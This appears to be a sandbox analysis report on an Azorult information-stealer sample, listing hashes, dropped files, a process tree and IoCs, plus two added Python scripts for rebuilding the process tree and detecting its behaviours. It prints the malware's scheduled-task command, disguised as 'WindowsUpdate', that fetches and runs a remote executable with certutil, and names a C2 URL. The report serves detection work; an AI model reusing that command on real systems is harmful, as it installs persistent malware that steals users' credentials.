Analysis
max time kernel: 152s
max time network: 192s
platform: windows10-2004_x64
resource: win10v2004-20221111-en
resource tags: arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
submitted: 30-11-2022 09:18
Static task
static1
Behavioral task
behavioral1
Sample: 8ba6987bd8e765df43142f5b7803c88eccc85faf.exe
Resource: win7-20220812-en
Behavioral task
behavioral2 (the run shown on this page)
Sample: 8ba6987bd8e765df43142f5b7803c88eccc85faf.exe
Resource: win10v2004-20221111-en
General
Target: 8ba6987bd8e765df43142f5b7803c88eccc85faf.exe
Size: 424KB
MD5: a9b6246022869177cb7d66177b2bb480
SHA1: 8ba6987bd8e765df43142f5b7803c88eccc85faf
SHA256: 18f0eeec4de09ac329406c8a6cc99763015cf654ebc5404bb6150f6cf879bcb8
SHA512: 21ccb922e58aec1c1aac280e8335c925b4d0982286c97844590682729e6f33896076cf1dddac366ae466b78c2d02ad588241bc0b658072b6edcf78a363c419d5
SSDEEP: 6144:37ecOvI7EzEGRtx516Zkc3a6ZXGokcG1W9TwfpkkUnbPJUDlm4aaEt2GoyN6pB+H:r5CEI6Z9a6Is19Twfp6nDwlmXlw5wc4
Malware Config
Extracted family: azorult
C2 URL (from the extracted config): http://balaborka.com/index.php
Signatures
Azorult
An information stealer first documented in 2016 that targets browser history and saved passwords.
Executes dropped EXE (4 IoCs)
PID   Process
1812  TELE.dll
4504  RTR.exe
3732  NBBB.dll
4312  moom.exe
TELE.dll and NBBB.dll have PIDs of their own here, so despite the extension they are PE executables launched directly, not libraries loaded into a host process.
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up the country code configured in the registry, likely a geofence.
Description        IoC                                                                                                   Process
Key value queried  \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation  TELE.dll
Key value queried  \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation  NBBB.dll
The SID in the path (S-1-5-21-4246620582-653642754-1174164128-1000) is the sandbox user's, so a detection should match on the HKCU\Control Panel\International\Geo\Nation suffix rather than on the full key path.
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). The sandbox's generic signature text adds "likely ransomware behaviour"; nothing else on this page shows file encryption, and for an Azorult stealer drive enumeration is more consistent with locating files to harvest.
NSIS installer (4 IoCs)
Resource                                    YARA rule
C:\Users\Admin\AppData\Local\Temp\moom.exe  nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\moom.exe  nsis_installer_2
C:\Users\Admin\AppData\Local\Temp\Moom.exe  nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\Moom.exe  nsis_installer_2
moom.exe and Moom.exe carry identical hashes in the Downloads section, so these are two spellings of one 35KB NSIS-packed file on a case-insensitive file system.
Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution. The task created here is the schtasks.exe command shown in the process tree.
Suspicious use of WriteProcessMemory (15 IoCs)
Each parent-to-child pair is recorded three times. That is consistent with the writes CreateProcess itself makes into a newly created child and is not on its own evidence of injection; the value of the records is the process chain they encode:
Source PID  Source process                                 Target PID  Target process  Writes
4220        8ba6987bd8e765df43142f5b7803c88eccc85faf.exe   1812        TELE.dll        3
1812        TELE.dll                                       4504        RTR.exe         3
4220        8ba6987bd8e765df43142f5b7803c88eccc85faf.exe   3732        NBBB.dll        3
3732        NBBB.dll                                       4312        moom.exe        3
4220        8ba6987bd8e765df43142f5b7803c88eccc85faf.exe   4324        schtasks.exe    3
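The WriteProcessMemory signature flattens what is really a process chain. The script below is an added example, not part of the sandbox report or its tooling: it parses records of the form `PID <src> wrote to memory of <dst> <src> <src image> <dst image>`, collapses the repeated entries into a write count, and prints the dropper's tree from the root down. The input is this page's own fifteen records, embedded as constructed sample text; the record layout is taken from this page and is assumed to hold for other reports of the same kind.

```python
"""Rebuild a process tree from a sandbox 'Suspicious use of WriteProcessMemory' signature.

Record layout (assumed from the report on this page):
    PID <src> wrote to memory of <dst> <src> <src image> <dst image>
A parent writing into a child it has just created is normal CreateProcess behaviour,
so the same pair repeats; what matters is the parent->child chain the records encode.
"""
import re
from collections import Counter

# Constructed input: the fifteen records from the signature above, one per line.
SAMPLE = """\
PID 4220 wrote to memory of 1812 4220 8ba6987bd8e765df43142f5b7803c88eccc85faf.exe TELE.dll
PID 4220 wrote to memory of 1812 4220 8ba6987bd8e765df43142f5b7803c88eccc85faf.exe TELE.dll
PID 4220 wrote to memory of 1812 4220 8ba6987bd8e765df43142f5b7803c88eccc85faf.exe TELE.dll
PID 1812 wrote to memory of 4504 1812 TELE.dll RTR.exe
PID 1812 wrote to memory of 4504 1812 TELE.dll RTR.exe
PID 1812 wrote to memory of 4504 1812 TELE.dll RTR.exe
PID 4220 wrote to memory of 3732 4220 8ba6987bd8e765df43142f5b7803c88eccc85faf.exe NBBB.dll
PID 4220 wrote to memory of 3732 4220 8ba6987bd8e765df43142f5b7803c88eccc85faf.exe NBBB.dll
PID 4220 wrote to memory of 3732 4220 8ba6987bd8e765df43142f5b7803c88eccc85faf.exe NBBB.dll
PID 3732 wrote to memory of 4312 3732 NBBB.dll moom.exe
PID 3732 wrote to memory of 4312 3732 NBBB.dll moom.exe
PID 3732 wrote to memory of 4312 3732 NBBB.dll moom.exe
PID 4220 wrote to memory of 4324 4220 8ba6987bd8e765df43142f5b7803c88eccc85faf.exe schtasks.exe
PID 4220 wrote to memory of 4324 4220 8ba6987bd8e765df43142f5b7803c88eccc85faf.exe schtasks.exe
PID 4220 wrote to memory of 4324 4220 8ba6987bd8e765df43142f5b7803c88eccc85faf.exe schtasks.exe
"""

# The source PID appears twice in every record; the back-reference enforces that.
RECORD = re.compile(r"PID (\d+) wrote to memory of (\d+) \1 (\S+) (\S+)")


def parse_records(text):
    """Return (src_pid, src_image, dst_pid, dst_image) for every well-formed record line."""
    out = []
    for line in text.splitlines():
        m = RECORD.search(line)
        if m:
            out.append((int(m.group(1)), m.group(3), int(m.group(2)), m.group(4)))
    return out


def build_tree(records):
    """Return (children, images, writes): adjacency list, PID->image name, write counts per pair."""
    children, images, writes = {}, {}, Counter()
    for src, src_img, dst, dst_img in records:
        images[src] = src_img
        images[dst] = dst_img
        writes[(src, dst)] += 1
        kids = children.setdefault(src, [])
        if dst not in kids:  # keep first-seen order, collapse the repeats
            kids.append(dst)
    return children, images, writes


def roots(children):
    """PIDs that write into others but are never written into themselves."""
    targets = {d for kids in children.values() for d in kids}
    return [p for p in children if p not in targets]


def render(children, images, writes, root, depth=0):
    """Indented text tree; each child line carries the number of writes its parent made into it."""
    lines = ["  " * depth + f"{root} {images[root]}"]
    for kid in children.get(root, []):
        sub = render(children, images, writes, kid, depth + 1)
        sub[0] += f"  ({writes[(root, kid)]} writes)"
        lines.extend(sub)
    return lines


def process_tree(text):
    """End to end: signature text in, rendered tree lines out."""
    children, images, writes = build_tree(parse_records(text))
    lines = []
    for r in roots(children):
        lines.extend(render(children, images, writes, r))
    return lines


if __name__ == "__main__":
    print("\n".join(process_tree(SAMPLE)))
```

Run stand-alone it prints the sample as root with TELE.dll, NBBB.dll and schtasks.exe one level down and RTR.exe and moom.exe under their respective droppers, each edge annotated with three writes.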
Processes
1. C:\Users\Admin\AppData\Local\Temp\8ba6987bd8e765df43142f5b7803c88eccc85faf.exe (PID 4220)
   Command line: "C:\Users\Admin\AppData\Local\Temp\8ba6987bd8e765df43142f5b7803c88eccc85faf.exe"
   - Suspicious use of WriteProcessMemory
   2. C:\Users\Admin\AppData\Local\Temp\TELE.dll (PID 1812)
      Command line: "C:\Users\Admin\AppData\Local\Temp\TELE.dll" -s -pfsdgsdfvsdzcxfsDC
      - Executes dropped EXE
      - Checks computer location settings
      - Suspicious use of WriteProcessMemory
      3. C:\Users\Admin\AppData\Roaming\RTR.exe (PID 4504)
         Command line: "C:\Users\Admin\AppData\Roaming\RTR.exe"
         - Executes dropped EXE
   2. C:\Users\Admin\AppData\Local\Temp\NBBB.dll (PID 3732)
      Command line: "C:\Users\Admin\AppData\Local\Temp\NBBB.dll" -s -pfsdgsdfvsdzcxfsDC
      - Executes dropped EXE
      - Checks computer location settings
      - Suspicious use of WriteProcessMemory
      3. C:\Users\Admin\AppData\Local\Temp\moom.exe (PID 4312)
         Command line: "C:\Users\Admin\AppData\Local\Temp\moom.exe"
         - Executes dropped EXE
   2. C:\Windows\SysWOW64\schtasks.exe (PID 4324)
      Command line: "schtasks.exe" /CREATE /SC MINUTE /MO 59 /TR "cmd.exe /C certutil.exe -urlcache -split -f http://asdfghjkl0.com/task_schedule.exe %TEMP%\task_schedule.exe && %TEMP%\task_schedule.exe" /TN WindowsUpdate /F
      - Creates scheduled task(s)

Notes on the tree (PIDs are taken from the signature tables above):
- TELE.dll and NBBB.dll are dropped to %TEMP% and run directly with the switches -s -pfsdgsdfvsdzcxfsDC. Those resemble the silent and password switches of a self-extracting archive stub, which would explain a PE with a .dll name being launched as a process; this is an inference from the command line, not something the sandbox reports. Each of them then drops and starts a second-stage executable (RTR.exe and moom.exe).
- The schtasks.exe command is both persistence and a second-stage fetch: the task named WindowsUpdate runs every 59 minutes (/SC MINUTE /MO 59), uses certutil.exe -urlcache -split -f to download http://asdfghjkl0.com/task_schedule.exe into %TEMP% and executes it, and /F silently overwrites any existing task of that name. asdfghjkl0.com is therefore a network IoC in addition to the extracted C2, and the task name is a masquerade on a legitimate Windows component.
- schtasks.exe is started from C:\Windows\SysWOW64, so the dropper is a 32-bit process reaching the 32-bit copy through WoW64 file-system redirection.
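Three of the behaviours recorded on this page (the Geo\Nation registry read flagged under "Checks computer location settings", the dropped executables run with a .dll extension, and the schtasks.exe task that fetches a second stage with certutil) map directly onto detection logic. The following is an added example and not the sandbox's rule engine or anything from the sample's author: it runs three rules over constructed events modelled on this page's process tree and registry IoC. The event dictionary shape and field names are assumptions, and the final /QUERY event is an invented benign control that must not fire.

```python
"""Detection rules for three behaviours in this report, applied to constructed
sandbox-style events. The event shape (type/pid/ppid/image/cmdline/key) is an
assumption made for this example; adapt the field names to your telemetry."""
import re

# Constructed events modelled on the process tree and registry IoC above.
# The final /QUERY event is an invented benign control that must not fire.
EVENTS = [
    {"type": "process_create", "pid": 4220, "ppid": 1000,
     "image": r"C:\Users\Admin\AppData\Local\Temp\8ba6987bd8e765df43142f5b7803c88eccc85faf.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\8ba6987bd8e765df43142f5b7803c88eccc85faf.exe"'},
    {"type": "process_create", "pid": 1812, "ppid": 4220,
     "image": r"C:\Users\Admin\AppData\Local\Temp\TELE.dll",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\TELE.dll" -s -pfsdgsdfvsdzcxfsDC'},
    {"type": "registry_query", "pid": 1812,
     "key": r"\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation"},
    {"type": "process_create", "pid": 4504, "ppid": 1812,
     "image": r"C:\Users\Admin\AppData\Roaming\RTR.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Roaming\RTR.exe"'},
    {"type": "process_create", "pid": 4324, "ppid": 4220,
     "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r'"schtasks.exe" /CREATE /SC MINUTE /MO 59 /TR "cmd.exe /C certutil.exe -urlcache -split -f '
                r'http://asdfghjkl0.com/task_schedule.exe %TEMP%\task_schedule.exe && %TEMP%\task_schedule.exe" '
                r'/TN WindowsUpdate /F'},
    {"type": "process_create", "pid": 9001, "ppid": 4220,
     "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r'"schtasks.exe" /QUERY /TN WindowsUpdate'},
]

# Match the key suffix only: the SID segment differs per user and per machine.
GEO_KEY_SUFFIX = r"\control panel\international\geo\nation"
URL = re.compile(r"""https?://[^\s"']+""", re.IGNORECASE)
TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping double-quoted runs as one token."""
    return [quoted or bare for quoted, bare in TOKEN.findall(cmdline)]


def schtasks_args(tokens):
    """Map each /SWITCH to the value that follows it; switches without a value map to True."""
    args, i = {}, 0
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("/"):
            if i + 1 < len(tokens) and not tokens[i + 1].startswith("/"):
                args[tok.upper()] = tokens[i + 1]
                i += 2
                continue
            args[tok.upper()] = True
        i += 1
    return args


def rule_scheduled_task_remote_payload(ev):
    """schtasks /CREATE whose action downloads something (certutil -urlcache or a bare URL)."""
    if ev["type"] != "process_create" or not ev["image"].lower().endswith("\\schtasks.exe"):
        return None
    args = schtasks_args(tokenize(ev["cmdline"]))
    action = args.get("/TR")
    if "/CREATE" not in args or not isinstance(action, str):
        return None
    urls = URL.findall(action)
    lowered = action.lower()
    uses_certutil_fetch = "certutil" in lowered and "-urlcache" in lowered
    if not urls and not uses_certutil_fetch:
        return None
    return {"rule": "scheduled_task_remote_payload", "pid": ev["pid"],
            "task": args.get("/TN"), "schedule": f"{args.get('/SC')}/{args.get('/MO')}",
            "urls": urls, "action": action}


def rule_executable_with_dll_extension(ev):
    """A process whose image path ends in .dll: a PE disguised by extension and run directly."""
    if ev["type"] == "process_create" and ev["image"].lower().endswith(".dll"):
        return {"rule": "executable_with_dll_extension", "pid": ev["pid"], "image": ev["image"]}
    return None


def rule_geo_nation_query(ev):
    """Read of Control Panel\\International\\Geo\\Nation under any user hive (SID-agnostic)."""
    if ev["type"] == "registry_query" and ev["key"].lower().endswith(GEO_KEY_SUFFIX):
        return {"rule": "geo_nation_query", "pid": ev["pid"], "key": ev["key"]}
    return None


RULES = (rule_scheduled_task_remote_payload, rule_executable_with_dll_extension, rule_geo_nation_query)


def run_rules(events):
    """Apply every rule to every event and return the findings in event order."""
    findings = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for finding in run_rules(EVENTS):
        print(finding)
```

The scheduled-task rule deliberately parses the /TR action rather than grepping the whole command line, so a task that merely mentions a URL in its name does not fire and the task name, interval and download URL come out as structured fields for the alert. The Geo\Nation rule alone is noisy (locale-aware software reads the same value); it is worth correlating with a process started from %TEMP% or %APPDATA%, as both readers on this page are.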
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
C:\Users\Admin\AppData\Local\Temp\Moom.exe
Filesize: 35KB
MD5: c9390e3854911caf1e62713201edc91a
SHA1: e2fd4e0e57aadd4e5af3eec8ed33fd404ececbdc
SHA256: 46b35ef08a27559aefa62de19391df8eee8535a94c17c82ff96b38d02f7520ba
SHA512: ecd7033da0f2fa756db3a48d9bb89e6b365a9b87b6434d590de8732c4d60bbb9ca8969a67c98e7e9c96be8b6d16ebe6723a3531c848fdd3fc534fe2e308472e8

C:\Users\Admin\AppData\Local\Temp\NBBB.dll
Filesize: 270KB
MD5: 76c0d2b7eb5e12cf8be7afa8848a284b
SHA1: d618f76f93d1d86e68789e4f1bbccbb2f2271e97
SHA256: 2e7aadf3967648baf07836eb464cafa4d74ef6ed6970b551c0bf719b01efc621
SHA512: bfca9b36d104a5135fe3a2dcb4e531e26e0b30c64fdef7740b96d142b9dc029916fe7041c2d31a90f03007d9b946828085847fc18d25cd8b2adc34f5f5564b54
C:\Users\Admin\AppData\Local\Temp\TELE.dll
Filesize: 318KB
MD5: 4c1669be5280d41749bdd3f7ebf3900a
SHA1: 6e2a5cb4f60225225eaf058fd6bfacc2a6fddc5e
SHA256: 853d71aaa7d63fa30595ace49b8ace3c2439fd1c10ba59628f8a45c4226bc2f7
SHA512: 4c0fcac3ffc6a95038042904da84ada5ab7ba0cb771e56a821aaa0735c14c6e99d5979b3a65c37fc95567c314aa1c039c84779379e569e90bf104720502d5d95
C:\Users\Admin\AppData\Local\Temp\moom.exe (same file as Moom.exe above)
Filesize: 35KB
MD5: c9390e3854911caf1e62713201edc91a
SHA1: e2fd4e0e57aadd4e5af3eec8ed33fd404ececbdc
SHA256: 46b35ef08a27559aefa62de19391df8eee8535a94c17c82ff96b38d02f7520ba
SHA512: ecd7033da0f2fa756db3a48d9bb89e6b365a9b87b6434d590de8732c4d60bbb9ca8969a67c98e7e9c96be8b6d16ebe6723a3531c848fdd3fc534fe2e308472e8

C:\Users\Admin\AppData\Roaming\RTR.exe
Filesize: 118KB
MD5: aa851fc2d1246b0015345bd553df643c
SHA1: ad944725f80b16c115754128dd2f8d7ccc931bd9
SHA256: fa565648efcd87cf810f2d19c41b9e9ddd6e6f9e326a12c0cc657ae1da19c2c9
SHA512: 48fccb77dc7fcea6ef564023c187bd44ad748ce1b1d0d812c80e918dc48c31d87174afb582e0c3f1f4ca84936e3ab482c101538695e58472b8ff69eb4d23c38e
Memory dumps (PID-to-image mapping taken from the process list above):
memory/1812-132-0x0000000000000000-mapping.dmp (TELE.dll)
memory/3732-138-0x0000000000000000-mapping.dmp (NBBB.dll)
memory/4312-141-0x0000000000000000-mapping.dmp (moom.exe)
memory/4324-144-0x0000000000000000-mapping.dmp (schtasks.exe)
memory/4504-135-0x0000000000000000-mapping.dmp (RTR.exe)